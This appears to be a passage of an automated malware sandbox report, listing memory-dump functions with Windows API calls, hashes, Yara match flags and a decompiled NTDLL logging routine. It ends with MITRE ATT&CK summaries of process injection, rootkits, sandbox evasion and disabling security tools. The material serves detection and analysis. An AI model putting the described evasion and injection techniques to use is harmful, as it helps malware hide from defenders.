Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 047D954A

Memory Dump Source

Source File: 00000007.00000002.701284539.0000000004770000.00000040.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000007.00000002.701509358.000000000488B000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.701519361.000000000488F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ff4f1d3c3d32fc37067f8ee36b871c362838995b35a2a91b7946c078bf248bb3
Instruction ID: af45c50d43e65b2d2ce1b6ab843e45ba7c3b387a824eb56456371f8c2e6c990c
Opcode Fuzzy Hash: ff4f1d3c3d32fc37067f8ee36b871c362838995b35a2a91b7946c078bf248bb3
Instruction Fuzzy Hash: B7900265211001072115A55B0704527004697DD3D5351C131F500A561CD661D8657161

Uniqueness

Uniqueness Score: -1.00%

Function 047D95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 047D95DA

Memory Dump Source

Source File: 00000007.00000002.701284539.0000000004770000.00000040.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000007.00000002.701509358.000000000488B000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.701519361.000000000488F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 867166286dd09b0764312006a8c65692f5a226234462b1d461b955ff75c3e85d
Instruction ID: dae631ac1b9f6a28223511168cc76e5f67a0ebdda26c6fce31c010bfa725b4ee
Opcode Fuzzy Hash: 867166286dd09b0764312006a8c65692f5a226234462b1d461b955ff75c3e85d
Instruction Fuzzy Hash: 1D9002A1202001076115715B4414636400A97E8285B51C131E50095A1DC565D8957165

Uniqueness

Uniqueness Score: -1.00%

Function 047D9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 047D966A

Memory Dump Source

Source File: 00000007.00000002.701284539.0000000004770000.00000040.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000007.00000002.701509358.000000000488B000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.701519361.000000000488F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e35e7eee1f724bd2dc968ef3ea25f89b3af2e594b7d6442a7ed957ba4af523d5
Instruction ID: 10195a9b5d54cf04b484ca811a62cf9e4dbf6d641554e0fe4aab3fad3fff6425
Opcode Fuzzy Hash: e35e7eee1f724bd2dc968ef3ea25f89b3af2e594b7d6442a7ed957ba4af523d5
Instruction Fuzzy Hash: 6E90027120100906F190715B440466A000597D9385F91C125A401A665DCA55DA5D77E1

Uniqueness

Uniqueness Score: -1.00%

Function 047D9650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 047D965A

Memory Dump Source

Source File: 00000007.00000002.701284539.0000000004770000.00000040.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000007.00000002.701509358.000000000488B000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.701519361.000000000488F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dffd56c2905f76c08cc2f561acd73202448ca12ef2abfa87beb148799e0ca554
Instruction ID: 17f453f1a4c9681325a2e1d90b557c656507a9418a8f759a9cf278df8541949a
Opcode Fuzzy Hash: dffd56c2905f76c08cc2f561acd73202448ca12ef2abfa87beb148799e0ca554
Instruction Fuzzy Hash: 8490027120504946F150715B4404A66001597D8389F51C121A40596A5D9665DD59B6A1

Uniqueness

Uniqueness Score: -1.00%

Function 047D96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 047D96EA

Memory Dump Source

Source File: 00000007.00000002.701284539.0000000004770000.00000040.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000007.00000002.701509358.000000000488B000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.701519361.000000000488F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d9eea4a5efb9ef58cd33e370bbc0de696bcbeae1571f224fa2ab0899904e437e
Instruction ID: cd101a76fa0c9f07cc18e3c5b17ac8c1f2525155b165ac45fbd843fb09fb72c4
Opcode Fuzzy Hash: d9eea4a5efb9ef58cd33e370bbc0de696bcbeae1571f224fa2ab0899904e437e
Instruction Fuzzy Hash: DF90027120108906F120615B840476A000597D8385F55C521A8419669D86D5D8957161

Uniqueness

Uniqueness Score: -1.00%

Function 047D96D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 047D96DA

Memory Dump Source

Source File: 00000007.00000002.701284539.0000000004770000.00000040.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000007.00000002.701509358.000000000488B000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.701519361.000000000488F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 42473a40009ebeb52bb1b15915d40432c3b9804b3a18372274f388fd68fdb82e
Instruction ID: 8695cc624938584a0e69db281d47e5b9af3d7690c334018b67fc92903cf0e79d
Opcode Fuzzy Hash: 42473a40009ebeb52bb1b15915d40432c3b9804b3a18372274f388fd68fdb82e
Instruction Fuzzy Hash: CF90027120100946F110615B4404B66000597E8385F51C126A4119665D8655D8557561

Uniqueness

Uniqueness Score: -1.00%

Function 047D9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 047D971A

Memory Dump Source

Source File: 00000007.00000002.701284539.0000000004770000.00000040.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000007.00000002.701509358.000000000488B000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.701519361.000000000488F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 675b72903bb688858035e3f7dc43ef61cada39aeea83ee1dae950982ba9a0af2
Instruction ID: 71baaf42da623eca123d709d694a4e8c3ed50c3e45c9d505e1bb6e79c25ee4f3
Opcode Fuzzy Hash: 675b72903bb688858035e3f7dc43ef61cada39aeea83ee1dae950982ba9a0af2
Instruction Fuzzy Hash: 0890027120100506F110659B5408666000597E8385F51D121A9019566EC6A5D8957171

Uniqueness

Uniqueness Score: -1.00%

Function 047D9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 047D9FEA

Memory Dump Source

Source File: 00000007.00000002.701284539.0000000004770000.00000040.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000007.00000002.701509358.000000000488B000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.701519361.000000000488F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: dbd9584c9e14cbfeac0c1788d86c0d74074866548417aecef33e609ea98851da
Instruction ID: ab6bd539f2516cf0a86d82c3fe91b44780911636de1eb3ffc646fa44a308ca57
Opcode Fuzzy Hash: dbd9584c9e14cbfeac0c1788d86c0d74074866548417aecef33e609ea98851da
Instruction Fuzzy Hash: 3290027131114506F120615B8404726000597D9285F51C521A4819569D86D5D8957162

Uniqueness

Uniqueness Score: -1.00%

Function 047D9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 047D978A

Memory Dump Source

Source File: 00000007.00000002.701284539.0000000004770000.00000040.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000007.00000002.701509358.000000000488B000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.701519361.000000000488F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9d4360831e7ecbfa831661c4add89f97481c376fcdd65b16aa5bf295947faf29
Instruction ID: 3bc4836719af13f8cf4bf223df4a1f27a5815c307fb0e5ba38f9e1f93733c075
Opcode Fuzzy Hash: 9d4360831e7ecbfa831661c4add89f97481c376fcdd65b16aa5bf295947faf29
Instruction Fuzzy Hash: 3690026921300106F190715B540862A000597D9286F91D525A400A569CC955D86D7361

Uniqueness

Uniqueness Score: -1.00%

Function 047D9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 047D986A

Memory Dump Source

Source File: 00000007.00000002.701284539.0000000004770000.00000040.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000007.00000002.701509358.000000000488B000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.701519361.000000000488F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1ea41c5881b82f92d88e6ea0ce6063e75f10842c323bd8acd9606b910806d6b1
Instruction ID: 71eac34a5c35543ef58f8afa778bfdb0b433bf8b75934a0fc4ed35ce0e7c589c
Opcode Fuzzy Hash: 1ea41c5881b82f92d88e6ea0ce6063e75f10842c323bd8acd9606b910806d6b1
Instruction Fuzzy Hash: 6A90027120100517F121615B4504727000997D82C5F91C522A4419569D9696D956B161

Uniqueness

Uniqueness Score: -1.00%

Function 047D9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 047D984A

Memory Dump Source

Source File: 00000007.00000002.701284539.0000000004770000.00000040.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000007.00000002.701509358.000000000488B000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.701519361.000000000488F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 641fb9f7ec84cecc23c399618eb2d226d65a4b2a2b15b96ff2c43d02ee63f23c
Instruction ID: 537e50a8da90fa5810de79456b9031f013bc1a7e0db11acff4d9f019c66c1ce3
Opcode Fuzzy Hash: 641fb9f7ec84cecc23c399618eb2d226d65a4b2a2b15b96ff2c43d02ee63f23c
Instruction Fuzzy Hash: 1A900261242042567555B15B44045274006A7E82C5791C122A5409961C8566E85AF661

Uniqueness

Uniqueness Score: -1.00%

Function 047D9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 047D991A

Memory Dump Source

Source File: 00000007.00000002.701284539.0000000004770000.00000040.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000007.00000002.701509358.000000000488B000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.701519361.000000000488F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ed74962d27c763d38bf13a07783f9e5262d6f3ed942c64e9417921b2e67d9007
Instruction ID: 13a6379118870754b863518492e3693e4796b57586f8e50b03e1c72b7ec18ccc
Opcode Fuzzy Hash: ed74962d27c763d38bf13a07783f9e5262d6f3ed942c64e9417921b2e67d9007
Instruction Fuzzy Hash: 659002B120100506F150715B4404766000597D8385F51C121A9059565E8699DDD976A5

Uniqueness

Uniqueness Score: -1.00%

Function 047D99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 047D99AA

Memory Dump Source

Source File: 00000007.00000002.701284539.0000000004770000.00000040.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000007.00000002.701509358.000000000488B000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.701519361.000000000488F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d80d455c3215c2ee5b9b16aa1d7387798177d4e65d102f2add105fde8051c0ea
Instruction ID: 491cf9bc2908f13e7f12f431628b748e6c0fe1440c31f96a8b1c5ae59844cb92
Opcode Fuzzy Hash: d80d455c3215c2ee5b9b16aa1d7387798177d4e65d102f2add105fde8051c0ea
Instruction Fuzzy Hash: 1E9002A134100546F110615B4414B260005D7E9385F51C125E5059565D8659DC567166

Uniqueness

Uniqueness Score: -1.00%

Function 047D9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 047D9A5A

Memory Dump Source

Source File: 00000007.00000002.701284539.0000000004770000.00000040.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000007.00000002.701509358.000000000488B000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.701519361.000000000488F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2383b36ada6657a7a5e435c0bb861110c55cbbac054c57af28a556dd0b296a1f
Instruction ID: 4930489b832c411f1faecafd7aac9bf28690145ffd4d818a86d4607fd988cbe6
Opcode Fuzzy Hash: 2383b36ada6657a7a5e435c0bb861110c55cbbac054c57af28a556dd0b296a1f
Instruction Fuzzy Hash: 7F90026121180146F210656B4C14B27000597D8387F51C225A4149565CC955D8657561

Uniqueness

Uniqueness Score: -1.00%

Function 003EA072, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,003D3AF8), ref: 003EA0AD

Strings

.z`, xrefs: 003EA09C, 003EA0A8

Memory Dump Source

Source File: 00000007.00000002.699879470.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: af3218222921f07d01c9acff119bfa2cb1c904a964f61daf54c339942c6cbf1b
Instruction ID: e5a913e077beeeb208dea795a164bcb22299a5d3f30b082e8fa7707968814708
Opcode Fuzzy Hash: af3218222921f07d01c9acff119bfa2cb1c904a964f61daf54c339942c6cbf1b
Instruction Fuzzy Hash: B6E0EDB52002546FD715DF65DC08EEB3B29AF88355F054248F9485B242C230E914CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 003EA080, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,003D3AF8), ref: 003EA0AD

Strings

.z`, xrefs: 003EA09C, 003EA0A8

Memory Dump Source

Source File: 00000007.00000002.699879470.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 935f54ec118586cae571dc8f872031a4bc77eeefa5566ff02eeaffe67b6ae786
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: AEE04FB12002186BD714DF59CC45EA777ACEF88750F014554FD085B252C630F910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 003D82F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 003D834A
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 003D836B

Memory Dump Source

Source File: 00000007.00000002.699879470.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 81f2e821957ab2a1431badcf38614930d0e28a6c88f3bfd69b1bdd7dec4ed174
Instruction ID: f47b79b56cd83c4d228867161ab549bdc3fbdd4b79ed43880aff4fadf9d9395d
Opcode Fuzzy Hash: 81f2e821957ab2a1431badcf38614930d0e28a6c88f3bfd69b1bdd7dec4ed174
Instruction Fuzzy Hash: 6601A732A402287BE722A6959C03FFE776C6B40F51F054115FF04BE2C1E694790647F6

Uniqueness

Uniqueness Score: -1.00%

Function 003EA0F0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 003EA144

Memory Dump Source

Source File: 00000007.00000002.699879470.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 27bf1058f18e7f6d8b449fc7ca210dbcdc1ad39ccdf7867a6437d37efa00c9fa
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 7201AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97251C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 003EA0ED, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 003EA144

Memory Dump Source

Source File: 00000007.00000002.699879470.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 9169a9528b8a8c8ef51a61523f9afb65a8e0163b079e4df9ff5c49219e3b9e5d
Instruction ID: 3023128c737c4b16f10809148591f82893221a470318eb1d0aed6e3674db2afb
Opcode Fuzzy Hash: 9169a9528b8a8c8ef51a61523f9afb65a8e0163b079e4df9ff5c49219e3b9e5d
Instruction Fuzzy Hash: 130114B2204149AFCB04DF88DC80DEB37ADAF8C350F168258FA4D97242C634E841CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 003EA040, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(003E4506,?,003E4C7F,003E4C7F,?,003E4506,?,?,?,?,?,00000000,00000000,?), ref: 003EA06D

Memory Dump Source

Source File: 00000007.00000002.699879470.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: dd0d70f28a9bf1d57a50b785d1de02a3825d8e603ced6dbf50312030168009e2
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 17E046B1200218ABDB14EF99CC41EA777ACEF88750F128558FE085B282C630F910CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 003EA1E0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,003DF1A2,003DF1A2,?,00000000,?,?), ref: 003EA210

Memory Dump Source

Source File: 00000007.00000002.699879470.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: f207c2fd82e3594a202bae9e60c34626bc2472a1f2f30e1cc4b300dc327250c1
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: E7E01AB12002186BDB10DF49CC85EE737ADAF88650F018154BA085B242CA30F8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 003DF69A, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,003D8CF4,?), ref: 003DF6CB

Memory Dump Source

Source File: 00000007.00000002.699879470.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: c4701703021744ffc6d63ddc87e5c3f2172d24a2dff6efbc689df317b4b713a8
Instruction ID: c03d2f421998255843fa1abefd262ac40c3d2f553b03a61e009ba9aa600e51d2
Opcode Fuzzy Hash: c4701703021744ffc6d63ddc87e5c3f2172d24a2dff6efbc689df317b4b713a8
Instruction Fuzzy Hash: 7AD02B855A83442BEB1166F11D07B1726058711340F4A0795E58CBF1D3C808C0060239

Uniqueness

Uniqueness Score: -1.00%

Function 003DF6A0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,003D8CF4,?), ref: 003DF6CB

Memory Dump Source

Source File: 00000007.00000002.699879470.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 25bed9740bb03e78d731493335abeb5a5df4df6e70947b2bd67e08914e854408
Instruction ID: c77744b2d07e5e25bb72ebd40b82f78f32e35ec645d01d5261254edae03eb7a5
Opcode Fuzzy Hash: 25bed9740bb03e78d731493335abeb5a5df4df6e70947b2bd67e08914e854408
Instruction Fuzzy Hash: 4CD0A7727903043BE610FAA59C03F2632CD6B44B00F490074FA49DB3C3D950E4004165

Uniqueness

Uniqueness Score: -1.00%

Function 047D967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 047D9694

Memory Dump Source

Source File: 00000007.00000002.701284539.0000000004770000.00000040.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000007.00000002.701509358.000000000488B000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.701519361.000000000488F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8ebd1cbfcd860ad335cfcfcd00836ab264f2a891605b8895180b9b81030c0b05
Instruction ID: 4b9088d37006f8d1a018a98b7b9e3dfb85700e65ee5ea896d8c634a962ed8a1a
Opcode Fuzzy Hash: 8ebd1cbfcd860ad335cfcfcd00836ab264f2a891605b8895180b9b81030c0b05
Instruction Fuzzy Hash: B5B09BF19014C5C9F711D7714A08737791077D4745F16C161D2024655A4778D495F6B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0482FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0482FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E047DCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04825720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04825720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x0482fdda
0x0482fde2
0x0482fde5
0x0482fdec
0x0482fdfa
0x0482fdff
0x0482fe0a
0x0482fe0f
0x0482fe17
0x0482fe1e
0x0482fe19
0x0482fe19
0x0482fe19
0x0482fe20
0x0482fe21
0x0482fe22
0x0482fe25
0x0482fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0482FDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0482FE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0482FE2B

Memory Dump Source

Source File: 00000007.00000002.701284539.0000000004770000.00000040.00000001.sdmp, Offset: 04770000, based on PE: true

Associated: 00000007.00000002.701509358.000000000488B000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.701519361.000000000488F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 88b37df517fbea510ea6bcdef4d551d5ea362c1489379276923125571fe6529d
Instruction ID: 79bd3b15a49be9ca22ac49a47f16a2d8fa736ba6c1ebc99c6713af0951a936a1
Opcode Fuzzy Hash: 88b37df517fbea510ea6bcdef4d551d5ea362c1489379276923125571fe6529d
Instruction Fuzzy Hash: D1F04C766801007FE6211A45CD01F337F6ADB40730F140305F714951D1EAA2FC60D6F4

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

